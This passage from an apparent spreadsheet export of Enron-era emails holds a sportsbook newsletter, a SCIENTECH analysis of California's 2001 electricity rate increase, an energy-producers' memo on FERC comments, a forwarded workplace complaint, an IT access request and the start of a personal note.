(Open date: Seattle )_x000D_
_x000D_
Week  13_x000D_
_x000D_
Thursday, Nov. 23_x000D_
Minnesota at  Dallas, 3:05 p.m._x000D_
New England at Detroit, 12:30 p.m. =20_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??Promotions=20_x000D_
_x000D_
_x000D_
_x000D_
STUFF THE TURKEY!!_x000D_
_x000D_
SportingbetUSA gives you yet  another reason to give thanks this year.=20_x000D_
[IMAGE]Everyone  knows that underdogs (or "Turkeys" as I like to call them)=_x000D_
=20_x000D_
have the  highest paying odds, but 'favorites' are safe bets. So, to =20_x000D_
accommodate our members' needs, we present to you the " Stuff the  Turkey "=_x000D_
=20_x000D_
NFL &amp; NBA promo. From now until Thanksgiving Day each  time you place a wag=_x000D_
er=20_x000D_
on a 'favorite' in either NFL or NBA, you get  a free entry into our=20_x000D_
Thanksgiving Day drawing in which you could  instantly win a very special=_x000D_
=20_x000D_
prize! What is it? It's what everybody  wants. It's a brand new Palm Vllx=_x000D_
=20_x000D_
handheld! So, stuff those turkeys  and the more wagers you place on=20_x000D_
'favorites' the better your chances  are to win._x000D_
_x000D_
NEW MEMBER?_x000D_
_x000D_
For a short while new  members can get 10% on all initial deposits of $300 =_x000D_
or=20_x000D_
more.  Unlike other sports books, you choose the bonus! Opt for either 10% =_x000D_
=20_x000D_
in the form of betfrequent points (which can be later redeemed for  great=_x000D_
=20_x000D_
prizes), a corresponding parlay, CASINO chips, or a cash  account deposit o=_x000D_
f=20_x000D_
up to $150. How's that for a bonus? =20_x000D_
_x000D_
Tell-A-Friend Reward_x000D_
_x000D_
Our Tell-A-Friend  Program gives you a chance to win cash by referring fami=_x000D_
ly=20_x000D_
and  friends to SportingbetUSA. When they open an account and make a =20_x000D_
deposit, you get $50 deposited into your account and are also  automaticall=_x000D_
y=20_x000D_
entered into both a weekly and a monthly  drawing for cash!=20_x000D_
_x000D_
Loyalty  Program_x000D_
_x000D_
SportingbetUSA is proud to have you as our  customer, and we'd like to than=_x000D_
k=20_x000D_
you for choosing our services! Each  time you place a wager our loyalty=20_x000D_
program rewards you with  Betfrequent points. These points will accumulate =_x000D_
in=20_x000D_
your account  until you decide to redeem them for one or more of our fabulo=_x000D_
us=20_x000D_
 prizes.=20_x000D_
_x000D_
*Please refer to our website for complete  details._x000D_
_x000D_
_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??NBA Schedule=20_x000D_
_x000D_
_x000D_
_x000D_
All times are Eastern p.m._x000D_
_x000D_
Thursday,  November 9_x000D_
Detroit at New Jersey 7:30=20_x000D_
Seattle at  Charlotte 7:30=20_x000D_
Philadelphia at Minnesota 8:00=20_x000D_
Orlando at  Chicago 8:30=20_x000D_
Vancouver at Houston 8:30=20_x000D_
Atlanta at Phoenix  9:00=20_x000D_
Denver at Portland 10:00=20_x000D_
_x000D_
Friday, November  10_x000D_
Indiana at Washington 7:00=20_x000D_
Cleveland at Toronto 7:00 =20_x000D_
New York at Boston 7:30=20_x000D_
San Antonio at Dallas 8:00=20_x000D_
Miami  at Utah 9:00=20_x000D_
Atlanta at L.A. Clippers 10:30=20_x000D_
Sacramento at  Golden State 10:30=20_x000D_
_x000D_
Saturday, November 11=20_x000D_
Seattle  at New Jersey 1:00=20_x000D_
Detroit at Indiana 7:00=20_x000D_
Charlotte at New  York 7:30=20_x000D_
Washington at Cleveland 7:30=20_x000D_
Boston at  Philadelphia 8:00=20_x000D_
Toronto at Chicago 8:30=20_x000D_
Minnesota at  Milwaukee 8:30=20_x000D_
Vancouver at San Antonio 8:30=20_x000D_
Miami at  Phoenix 9:00=20_x000D_
Houston at Portland 10:00=20_x000D_
_x000D_
Sunday,  November 12=20_x000D_
Seattle at Detroit 6:00=20_x000D_
L.A. Clippers at  Denver 9:00=20_x000D_
Orlando at Golden State 9:00=20_x000D_
Dallas at  Sacramento 9:00=20_x000D_
Houston at L.A. Lakers 9:30=20_x000D_
_x000D_
Monday,  November 13=20_x000D_
Portland at New Jersey 7:30=20_x000D_
Dallas at L.A.  Clippers 10:30=20_x000D_
_x000D_
Tuesday, November 14=20_x000D_
Charlotte at  Miami 7:30=20_x000D_
Portland at Atlanta 7:30=20_x000D_
Golden State at  Cleveland 7:30=20_x000D_
Orlando at Sacramento 8:00=20_x000D_
Chicago at Houston  8:30=20_x000D_
Utah at San Antonio 8:30=20_x000D_
Denver at L.A. Lakers 10:30 =20_x000D_
New York at Seattle 10:30=20_x000D_
_x000D_
Wednesday, November 15 =20_x000D_
Washington at Boston 7:00=20_x000D_
Cleveland at Philadelphia 7:00 =20_x000D_
Indiana at Detroit 7:30=20_x000D_
Miami at New Jersey 8:00=20_x000D_
Atlanta  at Milwaukee 8:00=20_x000D_
Golden State at Minnesota 8:00=20_x000D_
Dallas at  Phoenix 9:00=20_x000D_
New York at L.A. Clippers 10:30 =20_x000D_
_x000D_
Thursday, November 16=20_x000D_
San Antonio at Washington  7:00=20_x000D_
Portland at Toronto 7:00=20_x000D_
L.A. Lakers at Sacramento 8:00 =20_x000D_
Charlotte at Houston 8:30=20_x000D_
Chicago at Denver 9:00=20_x000D_
Orlando  at Utah 9:00=20_x000D_
L.A. Clippers at Vancouver 10:00=20_x000D_
_x000D_
Friday,  November 17=20_x000D_
Miami at Philadelphia 7:00=20_x000D_
Golden State at  Indiana 7:00=20_x000D_
Atlanta at Boston 7:30=20_x000D_
Detroit at Charlotte  7:30=20_x000D_
San Antonio at Minnesota 8:00=20_x000D_
Cleveland at Milwaukee  8:30=20_x000D_
New York at Phoenix 9:00=20_x000D_
Dallas at Seattle 10:00 =20_x000D_
_x000D_
Saturday, November 18=20_x000D_
Boston at Washington 7:00 =20_x000D_
Milwaukee at Toronto 7:00=20_x000D_
Portland at Miami 7:30 =20_x000D_
Minnesota at Atlanta 7:30=20_x000D_
Indiana at New Jersey 8:00 =20_x000D_
Phoenix at Houston 8:30=20_x000D_
L.A. Lakers at Denver 9:00 =20_x000D_
Chicago at Utah 9:00=20_x000D_
Dallas at Vancouver 10:00=20_x000D_
Seattle  at L.A. Clippers 10:30=20_x000D_
_x000D_
Sunday, November 19 =20_x000D_
Portland at Orlando 6:00=20_x000D_
Charlotte at Detroit 7:00 =20_x000D_
Golden State at New York 8:00=20_x000D_
Chicago at L.A. Lakers 9:30 =20_x000D_
_x000D_
Monday, November 20=20_x000D_
Philadelphia at Boston 7:00 =20_x000D_
Charlotte at Toronto 7:00=20_x000D_
Dallas at Utah 9:00=20_x000D_
Denver at  Vancouver 10:00=20_x000D_
New Jersey at L.A. Clippers 10:30 =20_x000D_
_x000D_
Tuesday, November 21=20_x000D_
Portland at Washington  7:00_x000D_
Houston at Indiana 7:00=20_x000D_
Detroit at Cleveland 7:30 =20_x000D_
New York at Orlando 8:00=20_x000D_
Seattle at Dallas 8:00=20_x000D_
Chicago  at Golden State 10:30=20_x000D_
_x000D_
Wednesday, November 22 =20_x000D_
Houston at Boston 7:00=20_x000D_
Cleveland at Miami 7:30 =20_x000D_
Philadelphia at Charlotte 7:30=20_x000D_
New York at Atlanta 7:30 =20_x000D_
Portland at Milwaukee 8:00=20_x000D_
Vancouver at Minnesota 8:00 =20_x000D_
Seattle at San Antonio 8:30=20_x000D_
Denver at Utah 9:00=20_x000D_
New  Jersey at Phoenix 9:00=20_x000D_
Golden State at L.A. Lakers  10:30_x000D_
Chicago at Sacramento 10:30=20_x000D_
_x000D_
_x000D_
NOTICE: Schedule subject to  change._x000D_
_x000D_
_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
?? Inside sportingbetUSA.com=20_x000D_
_x000D_
_x000D_
_x000D_
We have some great news for all of our SportingbetUSA  members. We have don=_x000D_
e=20_x000D_
an analysis of our loyalty program and have  found that it has been so=20_x000D_
effective that we are going to up the  ante! We are sliding the scale in yo=_x000D_
ur=20_x000D_
favor. Each time you risk  $6-$300 you get one betfrequent point for each=_x000D_
=20_x000D_
dollar. Here is where  it gets interesting. For every dollar amount exceedi=_x000D_
ng=20_x000D_
$300 you get  two betfrequent points! Not for a limited time, not  for a=20_x000D_
short while, and not until any date! From now on!  SportingbetUSA makes it=_x000D_
=20_x000D_
easier for you to redeem your betfrequent  points for one of our great priz=_x000D_
es=20_x000D_
or even a free wager. So, get in  the game and get more betfrequent points!_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??Your Voice=20_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
We at  sportingbetUSA.com look forward to your comments, ideas,  suggestion=_x000D_
s,=20_x000D_
and questions. Your feedback is valued as we strive to  keep us at the top =_x000D_
of=20_x000D_
our game. So, send us your input. We=01,d really  appreciate it and after a=_x000D_
ll,=20_x000D_
this is your sports  book._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
For Newsletter issues=20_x000D_
newsletter@sportingbetusa.com =20_x000D_
For loyalty program issues=20_x000D_
betfrequent@sportingbetUSA.com =20_x000D_
For affiliate network=20_x000D_
affiliate@sportingbetUSA.com =20_x000D_
For general questions or account problems=20_x000D_
custserv@sportingbetUSA.com =20_x000D_
For technical support on the web site=20_x000D_
webmaster@sportingbetUSA.com =20_x000D_
_x000D_
-Top-_x000D_
_x000D_
_x000D_
To unsuscribe from this newsletter send an email to=20_x000D_
sportingbetusa-unsubscribe@lists.sportingbet.com  with the word "remove" on=_x000D_
=20_x000D_
the subject field.=20_x000D_
No hard  feelings!=20_x000D_
?_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
...Get  in the Game ! =20_x000D_
_x000D_
_x000D_
 - sb-minilogo.gif_x000D_
 - fry2.jpg_x000D_
 - palm.jpg_x000D_
 - sbet.gif</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 03:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>California Regulators Approve Massive Rate Increase: Who Benefits_x000D_
 and Who Doesn't?</t>
  </si>
  <si>
    <t>Today's IssueAlert Sponsors:=20_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
The IBM e-Energy Executive Forum =01) "Personalization, Partnership, and=20_x000D_
Profitability"_x000D_
_x000D_
_x000D_
Designed for executives in the utility industry looking to leverage Custome=_x000D_
r=20_x000D_
Relationship Management in the competitive marketplace. Topics will focus o=_x000D_
n=20_x000D_
how process and technology can be leveraged to gain competitive advantage.=_x000D_
=20_x000D_
Featured speakers will include IT analysts, solution partners, IBM=20_x000D_
executives, and customers including: John Goodman, President of e-Satisfy;=_x000D_
=20_x000D_
Richard Grimes, Director of CRM Energy Services; David Bonnett, Global=20_x000D_
e-Energy Sales Executive, Siebel Systems.=20_x000D_
_x000D_
www.ibm.com=20_x000D_
_x000D_
Stay on top of the torrent of e-commerce information news and analysis with=_x000D_
=20_x000D_
SCIENTECH'S E-Commerce InfoGrid.  Get over 100 pages of daily tracked and=_x000D_
=20_x000D_
verified information regarding what gas, water, electric and utility servic=_x000D_
e=20_x000D_
businesses are doing to keep ahead in the e-commerce industry.  Download a=_x000D_
=20_x000D_
sample at www.ConsultRCI.com or contact Chris Vigil, toll-free at (888)=20_x000D_
972-8676 for more information.=20_x000D_
[IMAGE]_x000D_
The most comprehensive, up-to-date map of the North American Power System b=_x000D_
y=20_x000D_
RDI/FT Energy is now available from SCIENTECH. =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
IssueAlert for  March 29, 2001=20_x000D_
_x000D_
California Regulators Approve Massive Rate Increase:_x000D_
Who Benefits and Who Doesn't?_x000D_
_x000D_
by Will McNamara=20_x000D_
Director, Electric Industry Analysis_x000D_
_x000D_
California regulators earlier this week approved electricity rate increases=_x000D_
=20_x000D_
topping 40 percent, the largest in the state's history. The California Publ=_x000D_
ic=20_x000D_
Utilities Commission (CPUC) voted unanimously to raise rates by 3 cents /=_x000D_
=20_x000D_
KWh. The rate hikes, which take effect immediately but won't appear on=20_x000D_
customer bills until May, apply to millions of customers of Southern=20_x000D_
California Edison and Pacific Gas and Electric, the state's two largest=20_x000D_
utilities. Low-income residents are exempt from the increases. =20_x000D_
_x000D_
Analysis: For context, keep in mind that it was only two months ago that th=_x000D_
e=20_x000D_
CPUC approved its first rate increase in response to the staggering debt of=_x000D_
=20_x000D_
SCE and PGOand other factors related to the California energy crisis.  In=_x000D_
=20_x000D_
early January, the CPUC approved temporary rate hikes of 9 percent for=20_x000D_
residential customers (about $5 a month for the average customer) and 7 to =_x000D_
15=20_x000D_
percent for businesses. The temporary increases were only to remain in effe=_x000D_
ct=20_x000D_
for 90 days and will be expiring shortly. At that time, both PGOand SCE=20_x000D_
denounced the temporary increase, which was not surprising considering that=_x000D_
=20_x000D_
the 9 to 15 percent increase was much lower than the utilities had requeste=_x000D_
d=20_x000D_
(PGOasked for a 26-percent increase and SCE had asked for 30 percent). The=_x000D_
=20_x000D_
January rate increase was followed by an additional 10-percent increase tha=_x000D_
t=20_x000D_
is set to take effect next year. =20_x000D_
_x000D_
The CPUC's current ruling increases rates by about 42 percent at SCE and 46=_x000D_
=20_x000D_
percent at PG&amp;E. However, the CPUC's measure will most likely serve to=20_x000D_
benefit the state more than SCE or PG&amp;E. The CPUC clearly established that=_x000D_
=20_x000D_
none of the additional revenue earned from the rate increases can be used b=_x000D_
y=20_x000D_
the utilities to pay for past power purchase costs, which have amounted to=_x000D_
=20_x000D_
about $13 billion. In addition, the CPUC adopted a proposal by consumer gro=_x000D_
up=20_x000D_
Toward Utility Rate Normalization (TURN) that a rate cap preventing the=20_x000D_
utilities from charging market rates should be extended. In other words, th=_x000D_
e=20_x000D_
portion of the electric rates that PGOand SCE actually receive from=20_x000D_
ratepayers will remain frozen for the foreseeable future. The CPUC has=20_x000D_
established that the utilities must still recover billions of dollars in=20_x000D_
stranded costs before the rate freeze can be lifted. =20_x000D_
_x000D_
Thus, it appears that most of the revenue accumulated from the rate increas=_x000D_
es=20_x000D_
will be used to reimburse the state of California for the power purchases i=_x000D_
t=20_x000D_
continues to make on behalf of the utilities and will not be used to pay of=_x000D_
f=20_x000D_
any existing debt held by the utilities. PGOalready has responded that the=_x000D_
=20_x000D_
CPUC ruling attempts to "completely change the ratemaking rules that are us=_x000D_
ed=20_x000D_
to determine the end of the rate freeze under AB1890." PGOhas said that it=_x000D_
=20_x000D_
will challenge this and other aspects of the CPUC ruling.=20_x000D_
_x000D_
However, even though most of the money from the rate increases will go to t=_x000D_
he=20_x000D_
state, it is also not presently clear if the increases will be sufficient t=_x000D_
o=20_x000D_
reimburse California for the $4 billion it has already spent to procure=20_x000D_
power, or compensate for the anticipated $14 billion that it will have to p=_x000D_
ay=20_x000D_
for power this year. Some of the funds generated by the rate increases must=_x000D_
=20_x000D_
be used by PGOand SCE to pay for power that they still obtain from supplier=_x000D_
s=20_x000D_
or to cover costs for their own power generation. Consequently, the CPUC ha=_x000D_
s=20_x000D_
left open the possibility that additional rate increases may be necessary. =_x000D_
=20_x000D_
_x000D_
Although it is still being evaluated how individual customer classes will b=_x000D_
e=20_x000D_
impacted by the rate increases, it is fairly clear that large commercial an=_x000D_
d=20_x000D_
industrial customers will end up paying the most.  Loretta Lynch, president=_x000D_
=20_x000D_
of the CPUC, maintained that an underlying goal of the increase is to force=_x000D_
=20_x000D_
what she referred to as "electricity hogs," or those people who excessively=_x000D_
=20_x000D_
use power without concern for the state's supply shortage, to conserve. Lyn=_x000D_
ch=20_x000D_
has said that conservation is the key to staving off additional rate hikes,=_x000D_
=20_x000D_
and that the higher rates should put financial pressure on Californians to=_x000D_
=20_x000D_
conserve energy, which theoretically should help to reduce the risk of=20_x000D_
blackouts in the state this summer. The average residential cost for a=20_x000D_
kilowatt hour is about 12.5 cents for SCE customers and 10.5 cents for=20_x000D_
PGOcustomers. The new rate increase will add about 3 cents / KWh for the=20_x000D_
customers of both utilities, which as noted averages out to about a=20_x000D_
42-percent increase at SCE and a 46-percent increase at PGO(for electricity=_x000D_
=20_x000D_
alone). =20_x000D_
_x000D_
However, Lynch also established that a "tiered" pricing structure, which ha=_x000D_
s=20_x000D_
yet to be fully determined, will be put into place. The tiered pricing syst=_x000D_
em=20_x000D_
will reward customers who conserve energy and penalize those who do not.=20_x000D_
Essentially this means that those customers who use the most power will=20_x000D_
ultimately pay the most, and could face additional rate increases this year=_x000D_
,=20_x000D_
which the CPUC did not rule out as a possibility. Under a tiered pricing=20_x000D_
structure, those customers who conserve on their power usage may not see=20_x000D_
their bills increase beyond the rate increase approved this week. =20_x000D_
_x000D_
The CPUC also ruled that PGOand SCE must pay small independent generators i=_x000D_
n=20_x000D_
the state (known as qualifying facilities) for energy within 15 days of=20_x000D_
delivery. Over the last week, California has again issued Stage 3=20_x000D_
emergencies, signaling that power reserves have fallen to dangerously low=_x000D_
=20_x000D_
levels. Contributing to the problem is the fact that QFs have stopped=20_x000D_
producing in recent weeks as a result of the financial problems of PGOand S=_x000D_
CE=20_x000D_
and the fact that they have been paid only a small percentage of what they=_x000D_
=20_x000D_
are owed for power previously produced. Under normal circumstances, the QFs=_x000D_
=20_x000D_
can generate as much as 30 percent of the state's electricity needs. The CP=_x000D_
UC=20_x000D_
ruled that PGOand SCE must pay the QFs within 15 days of the end of a billi=_x000D_
ng=20_x000D_
period, or suffer from penalties equal to the amount of their outstanding=_x000D_
=20_x000D_
payment.=20_x000D_
_x000D_
Gray Davis, who throughout his tenure as California's governor assured=20_x000D_
Californians that rates would not be increased, attempted to distance himse=_x000D_
lf=20_x000D_
from the CPUC's ruling, and in fact issued a statement that he has no contr=_x000D_
ol=20_x000D_
over the commission's decision. Further, Davis said that the rate increase=_x000D_
=20_x000D_
was "premature" because the state is still evaluating the financial numbers=_x000D_
=20_x000D_
that are needed to make a sound decision. In turn, the CPUC's Lynch=20_x000D_
criticized both the governor and the Federal Energy Regulatory Commission=_x000D_
=20_x000D_
(FERC) for "failing to act" on energy rates up to this point.=20_x000D_
_x000D_
In addition to its comments regarding the rate freeze, PGOresponded with a=_x000D_
=20_x000D_
mixed reaction to the CPUC's ruling on the rate increase. On one hand, the=_x000D_
=20_x000D_
utility said the ruling offered a "welcome dose of realism." However, the=_x000D_
=20_x000D_
utility also said that the rate increase "does not offer a comprehensive=20_x000D_
solution, fails to resolve the uncertainty of the crisis and may even creat=_x000D_
e=20_x000D_
more instability." Based on previous statements that PGOhas made, the utili=_x000D_
ty=20_x000D_
believes that the state's fundamental problem has its origins in the=20_x000D_
wholesale market, where prices have often exceeded $300/MWh. =20_x000D_
_x000D_
Some power generators, many of whom have been lambasted by California and=_x000D_
=20_x000D_
federal regulators for alleged price gouging, went on record with a favorab=_x000D_
le=20_x000D_
response to the rate increases. Jeffrey Skilling, Enron's CEO, said, "There=_x000D_
's=20_x000D_
been a need to balance supply and demand [in California] and to date I don'=_x000D_
t=20_x000D_
think anyone has been willing to let the prices rise to help balance supply=_x000D_
=20_x000D_
and demand. So [the increases] are a huge step forward in reducing the odds=_x000D_
=20_x000D_
of shortfalls."  Keith Bailey, chairman and CEO of Williams, told Reuters=_x000D_
=20_x000D_
that he thought the CPUC's rate increase was a rational decision and=20_x000D_
something that the industry has been suggesting for some time. =20_x000D_
_x000D_
Naturally, many consumer activists reacted vehemently against the rate=20_x000D_
increases and protested during the CPUC's proceedings. The main argument of=_x000D_
=20_x000D_
the consumer groups is that the CPUC, the governor and FERC have not=20_x000D_
fulfilled their regulatory responsibilities in bringing down electricity=20_x000D_
prices in the state and have not acted with enough force to restrict what=_x000D_
=20_x000D_
they perceive as excessive prices for power owned by out-of-state generator=_x000D_
s.=20_x000D_
This position gained momentum last week when the California ISO reported th=_x000D_
at=20_x000D_
electricity wholesalers overcharged state utilities by $5.5 billion over th=_x000D_
e=20_x000D_
past 10 months. Consumer groups also continue to oppose any sort of a=20_x000D_
bail-out for PGOand SCE and believe that the utilities have hidden money=20_x000D_
under the protection of other subsidiaries within their parent companies.=_x000D_
=20_x000D_
Both utilities maintain that any financial restructuring activities they ha=_x000D_
ve=20_x000D_
implemented have been legal. =20_x000D_
_x000D_
Moreover, while the rate increases may help the state to continue securing=_x000D_
=20_x000D_
power on behalf of the utilities, other fundamental problems related to the=_x000D_
=20_x000D_
state's energy crisis remain unresolved. The CPUC has asserted that part of=_x000D_
=20_x000D_
the benefit of the rate increases is to keep the utilities financially=20_x000D_
solvent. However, at the same time, the commission clearly states that none=_x000D_
=20_x000D_
of the extra revenue generated by the rate hikes can be used to pay down th=_x000D_
e=20_x000D_
utilities' outstanding debt. Consequently, although the higher rates should=_x000D_
=20_x000D_
significantly increase revenues for both utilities ($2.3 billion a year for=_x000D_
=20_x000D_
SCE and $2.5 billion a year for PG&amp;E), all of this money apparently will be=_x000D_
=20_x000D_
turned over to the state and do little to alleviate the utilities' own=20_x000D_
financial problems. This issue still remains unresolved and under the domai=_x000D_
n=20_x000D_
of the state legislature. However, the likelihood that PGOand SCE would nee=_x000D_
d=20_x000D_
to declare bankruptcy remains strong (unless additional rate increases or=_x000D_
=20_x000D_
securitization takes place). In addition, other fundamental problems such a=_x000D_
s=20_x000D_
the supply / demand imbalance in California and the related volatility of t=_x000D_
he=20_x000D_
state's wholesale market continue to wreak havoc on the market's=20_x000D_
stakeholders. While the CPUC's rate increases may be a positive step toward=_x000D_
=20_x000D_
stabilizing the state's financial, the future remains quite uncertain for=_x000D_
=20_x000D_
PGOand SCE.=20_x000D_
_x000D_
An archive list of previous IssueAlerts is available at_x000D_
www.ConsultRCI.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Reach thousands of utility analysts and decision makers every day. Your=20_x000D_
company can schedule a sponsorship of IssueAlert by contacting Nancy Spring=_x000D_
 =20_x000D_
via e-mail or calling (505)244-7613. Advertising opportunities are also=20_x000D_
available on our website.=20_x000D_
SCIENTECH is pleased to provide you with your free,  daily IssueAlert. Let =_x000D_
us=20_x000D_
know if we can help you with  in-depth analyses or any other SCIENTECH=20_x000D_
information  products. If you would like to refer a colleague to receive ou=_x000D_
r=20_x000D_
free,  daily IssueAlerts, please reply to this email and include  their ful=_x000D_
l=20_x000D_
name and email address or register directly on our site. =20_x000D_
_x000D_
If you no longer wish to receive this daily email, send a message to=20_x000D_
IssueAlert, and include the word "delete" in the subject line.=20_x000D_
SCIENTECH's IssueAlerts(SM) are compiled based on the  independent analysis=_x000D_
=20_x000D_
of SCIENTECH consultants. The opinions expressed in  SCIENTECH's IssueAlert=_x000D_
s=20_x000D_
are not intended to predict financial performance  of companies discussed, =_x000D_
or=20_x000D_
to be the basis for investment decisions of any  kind. SCIENTECH's sole=20_x000D_
purpose in publishing its IssueAlerts is to offer  an independent perspecti=_x000D_
ve=20_x000D_
regarding the key events occurring in the  energy industry, based on its=20_x000D_
long-standing reputation as an expert on  energy issues. =20_x000D_
_x000D_
_x000D_
Copyright 2001. SCIENTECH, Inc. All rights  reserved.</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 09:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'fblaylock@covantaenergy.com', 'rjhunter@spectrumcapital.com', 'jgreco@caithnessenergy.com', 'fgent@thermoecotek.com', 'hedsf@aol.com', 'rjtormey@duke-energy.com', 'william_carlson@wastemanagement.com', 'carol@iepa.com', 'al.jensen@nrgenergy.com', 'eric.eisenman@gen.pge.com', 'peterweiner@paulhastings.com', 'edstrome@epenergy.com', 'abb@eslawfirm.com', 'rventurini@teamgsi.net', 'kburton@covantaenergy.com', 'billw@calpine.com', 'steve_ponder@fpl.com', 'cody.carter@williams.com', 'lynch@sl.net', 'emaddox@seawestwindpower.com', 'mark.fillinger@enron.com', 'fernley.doug@epenergy.com', 'rskoebbe@powerworksinc.com', 'orourke.john@epenergy.com', 'tcortopassi@covantaenergy.com', 'sangorgon@aol.com', 'pete@calwind.com', 'dfrank@seawestwindpower.com', 'jweisgall@aol.com', 'curt.hatton@gen.pge.com', 'alex.sugaoka@uaecorp.com', 'joer@calpine.com', 'rcsc@west.net', 'bfpjv@c-zone.net', 'mcmannes@aol.com', 'ain@worldnet.att.net', 'kent.palmerton@williams.com', 'siliff@riobravo-gm.com', 'elozowicki@sjo.coudert.com', 'kellyl@enxco.com', 'kgough@calpine.com', 'mark_j_smith@fpl.com', 'rjszymanski@powerworksinc.com', 'smara@enron.com', 'hawkins@2000energy.com', 'smutny@iepa.com', 'gtbl@dynegy.com', 'dean_gosselin@fpl.com', 'alexm@calpine.com', 'twetzel@thermoecotek.com', 'wscobee@caithnessenergy.com', 'rachel.king@elpaso.com', 'harlans@epenergy.com', 'david.parquet@enron.com', 'bob.gates@enron.com', 'jeff.dasovich@enron.com', 'bbuchynsky@aol.com', 'c.johnson@ejgd.com', 'charles.linthicum@powersrc.com', 'alan.comnes@enron.com', 'rescalante@riobravo-gm.com', 'marty_mcfadden@covantaenergy.com', 'dscholl@purenergyllc.com', 'swank.thomas@epenergy.com', 'dnelsen@gwfpower.com', 'tom_hartman@fpl.com', 'freesrj@apci.com', 'hap_boyd@enron.com', 'hellertj@apci.com', 'efeo@milbank.com', 'wcarlson@wm.com', 'sdl@calwind.com', 'bellery@spi-ind.com', 'pwood@covantaenergy.com', 'mrmonagan@aol.com', 'jheckdoyle@aol.com', 'bill.barnes@lgeenergy.com', 'roger.pelote@williams.com', 'psoos@covantaenergy.com', 'jackp@calpine.com', 'kellerman.larry@epenergy.com', 'david.dickey@calenergy.com', 'rich_dyer@covantaenergy.com', 'kbssac@aol.com', 'agilford@wbcounsel.com', 'nam.nguyen@powersrc.com', 'wkawamoto@wm.com', 'wfhall2@duke-energy.com', 'khoffman@caithnessenergy.com', 'jsimon@epsa.org', 'ed.tomeo@uaecorp.com', 'rboyd@enron.com', 'cabaker@duke-energy.com', 'armen.arslanian@gecapital.com', 'difellman@energy-law-group.com', 'curtis_l_kebler@reliantenergy.com'})</t>
  </si>
  <si>
    <t>Draft IEP comments on FERC "obstacles" order and Conference Call_x000D_
 info</t>
  </si>
  <si>
    <t>Greetings:_x000D_
_x000D_
Please find IEP=01,s nitial draft of comments on the FERC "obstacles" order=_x000D_
.?=20_x000D_
This is mainly composed of QF issues and a few other issues that may affect=_x000D_
=20_x000D_
the rest of the membership.? Please send any of your comments or specific=_x000D_
=20_x000D_
company filings to Andy and I as soon as possible._x000D_
_x000D_
?_x000D_
_x000D_
We will hold a joint (ISO/FERC and QF Committee) conference call tomorrow,=_x000D_
=20_x000D_
Thursday March 29th at 3:00 PST to discuss IEP=01,s filing on Friday._x000D_
_x000D_
?_x000D_
_x000D_
The Call-in number is 1-800-486-2726_x000D_
_x000D_
The Participant Code is 120895_x000D_
_x000D_
?_x000D_
_x000D_
Comments are due to be filed on March 30.?=20_x000D_
_x000D_
?_x000D_
_x000D_
If you have any questions please let me know._x000D_
_x000D_
?_x000D_
_x000D_
Katie Kaplan_x000D_
_x000D_
Manager of State Policy Affairs_x000D_
_x000D_
Independent Energy Producers Association_x000D_
_x000D_
(916) 448-9499_x000D_
_x000D_
?_x000D_
_x000D_
?_x000D_
 - 010330_EL01-47-000_DRAFT_IEP_Cmt1.doc</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 07:31:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'adam.umanoff@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'darrell.orban@enron.com', 'eric.newell@enron.com'})</t>
  </si>
  <si>
    <t>SAFETY VIOLATIONS, DISCRIMINATION AT ENRON WIND -- SUPER_x000D_
 CONFIDENTIAL</t>
  </si>
  <si>
    <t xml:space="preserve">Eric and Darrell - Please investigate these complaints.  Joseph (who I do not know) is raising discrimination concerns as well as safety concerns.   Darrell - also send a written message to Joseph letting him know that his concerns have been brought to your attention and that we will take appropriate action to investigate.  Eric - you may want to drop Jim Derrick a note (since Key Lay was copied on this) and give him a heads-up.  Thanks. Adam  _x000D_
---------------------- Forwarded by Adam Umanoff/EWC/Enron on 11/21/2001 07:35 AM ---------------------------_x000D_
_x000D_
_x000D_
Joseph Toman_x000D_
11/21/2001 07:24 AM_x000D_
To:	Kenneth Lay/Enron@EnronXGate, Adam Umanoff/EWC/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	SAFETY VIOLATIONS, DISCRIMINATION AT ENRON WIND -- SUPER CONFIDENTIAL_x000D_
_x000D_
Please review these files -- to help correct the situation. JT_x000D_
_x000D_
_x000D_
_x000D_
           _x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 02:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for cheryl.ingstad@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a security approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000008853&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000008853_x000D_
Request Create Date : 12/1/00 10:08:24 AM_x000D_
Requested For       : cheryl.ingstad@enron.com_x000D_
Resource Name       : EOL US Backoffice  Data Manager_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 01:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>I can't believe it.</t>
  </si>
  <si>
    <t>I can't believe we have a puppy.  Everything smells like puppy to me, even _x000D_
though I took a very long shower.  Michael and Pal had a nice visit this _x000D_
